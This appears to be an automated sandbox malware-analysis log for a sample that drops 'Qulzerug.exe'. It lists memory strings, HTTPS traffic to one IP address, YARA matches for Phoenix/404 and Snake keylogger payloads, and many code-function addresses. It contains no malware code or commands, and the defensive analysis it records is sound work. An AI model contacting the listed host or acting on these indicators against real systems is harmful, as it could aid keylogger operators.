Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000029E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49711 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected PhoenixKeylogger

Source: Yara match	File source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.Qulzerug.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 0000000D.00000002.2495878153.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.2495830056.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTR	Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
Source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 0_2_084DDA70	0_2_084DDA70
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 0_2_084C0040	0_2_084C0040
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 0_2_084C0006	0_2_084C0006
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_0158B341	8_2_0158B341
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_01588670	8_2_01588670
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_01584B58	8_2_01584B58
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_01587A58	8_2_01587A58
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_0158DD60	8_2_0158DD60
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_01587DA0	8_2_01587DA0
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE76F8	8_2_06AE76F8
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AEB6F0	8_2_06AEB6F0
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AEAE38	8_2_06AEAE38
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE6E30	8_2_06AE6E30
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE2648	8_2_06AE2648
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE7FC0	8_2_06AE7FC0
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE5CA0	8_2_06AE5CA0
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE0DB0	8_2_06AE0DB0
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE6568	8_2_06AE6568
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AEA2B8	8_2_06AEA2B8
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AED258	8_2_06AED258
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE4250	8_2_06AE4250
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE1B90	8_2_06AE1B90
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE53D8	8_2_06AE53D8
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE4B10	8_2_06AE4B10
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE8880	8_2_06AE8880
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE3988	8_2_06AE3988
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE99F0	8_2_06AE99F0
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE9148	8_2_06AE9148
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE76E8	8_2_06AE76E8
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AEB6E1	8_2_06AEB6E1
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AEAE23	8_2_06AEAE23
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE6E20	8_2_06AE6E20
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE2637	8_2_06AE2637
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE7FB0	8_2_06AE7FB0
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE2F02	8_2_06AE2F02
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE2F10	8_2_06AE2F10
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE1CA8	8_2_06AE1CA8
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE1C99	8_2_06AE1C99
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE5C90	8_2_06AE5C90
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE0DA1	8_2_06AE0DA1
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE6558	8_2_06AE6558
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AEA2AA	8_2_06AEA2AA
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE4AFF	8_2_06AE4AFF
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AED24A	8_2_06AED24A
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE4240	8_2_06AE4240
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE53CA	8_2_06AE53CA
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE886F	8_2_06AE886F
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE99E0	8_2_06AE99E0
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE9138	8_2_06AE9138
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06AE397A	8_2_06AE397A
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06B7AA30	8_2_06B7AA30
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06B7DCB0	8_2_06B7DCB0
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06B70040	8_2_06B70040
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06B786EE	8_2_06B786EE
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Code function: 8_2_06B70006	8_2_06B70006
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 9_2_0863DA70	9_2_0863DA70
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 9_2_08620040	9_2_08620040
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 9_2_08620006	9_2_08620006
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 11_2_0809DA70	11_2_0809DA70
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 11_2_0808000A	11_2_0808000A
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 11_2_08080040	11_2_08080040
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_0161B341	12_2_0161B341
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_01618670	12_2_01618670
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_01617A58	12_2_01617A58
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_0161DD60	12_2_0161DD60
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_01617DA0	12_2_01617DA0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_0161DD57	12_2_0161DD57
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D5B6F0	12_2_06D5B6F0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D576F8	12_2_06D576F8
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D52648	12_2_06D52648
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D56E30	12_2_06D56E30
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D5AE38	12_2_06D5AE38
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D57FC0	12_2_06D57FC0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D55CA0	12_2_06D55CA0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D50DB0	12_2_06D50DB0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D56568	12_2_06D56568
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D5A2B8	12_2_06D5A2B8
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D54250	12_2_06D54250
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D5D258	12_2_06D5D258
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D553D8	12_2_06D553D8
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D51B90	12_2_06D51B90
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D54B10	12_2_06D54B10
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D58880	12_2_06D58880
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D599F0	12_2_06D599F0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D53988	12_2_06D53988
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D59148	12_2_06D59148
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D576EF	12_2_06D576EF
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D5B6EB	12_2_06D5B6EB
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D52643	12_2_06D52643
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D56E25	12_2_06D56E25
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D5AE2F	12_2_06D5AE2F
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D57FB3	12_2_06D57FB3
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D52F10	12_2_06D52F10
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D52F03	12_2_06D52F03
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D55C93	12_2_06D55C93
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D51CA3	12_2_06D51CA3
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D51CA8	12_2_06D51CA8
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D50DAB	12_2_06D50DAB
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D56558	12_2_06D56558
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D54AFF	12_2_06D54AFF
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D5A2B3	12_2_06D5A2B3
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D5424B	12_2_06D5424B
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D5D24B	12_2_06D5D24B
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D553D3	12_2_06D553D3
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D5887B	12_2_06D5887B
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D599EB	12_2_06D599EB
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D53983	12_2_06D53983
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06D59143	12_2_06D59143
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06DEDCB0	12_2_06DEDCB0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06DEAA30	12_2_06DEAA30
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06DE0040	12_2_06DE0040
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06DEB1A3	12_2_06DEB1A3
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 12_2_06DE0007	12_2_06DE0007
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_0102B341	13_2_0102B341
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_01028670	13_2_01028670
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_01027A58	13_2_01027A58
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_0102DD60	13_2_0102DD60
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_01027DA0	13_2_01027DA0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D76F8	13_2_068D76F8
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068DB6F0	13_2_068DB6F0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068DAE38	13_2_068DAE38
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D6E30	13_2_068D6E30
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D2648	13_2_068D2648
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D7FC0	13_2_068D7FC0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D5CA0	13_2_068D5CA0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D0DB0	13_2_068D0DB0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D6568	13_2_068D6568
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068DA2B8	13_2_068DA2B8
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068DD258	13_2_068DD258
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D4250	13_2_068D4250
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D1B90	13_2_068D1B90
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D53D8	13_2_068D53D8
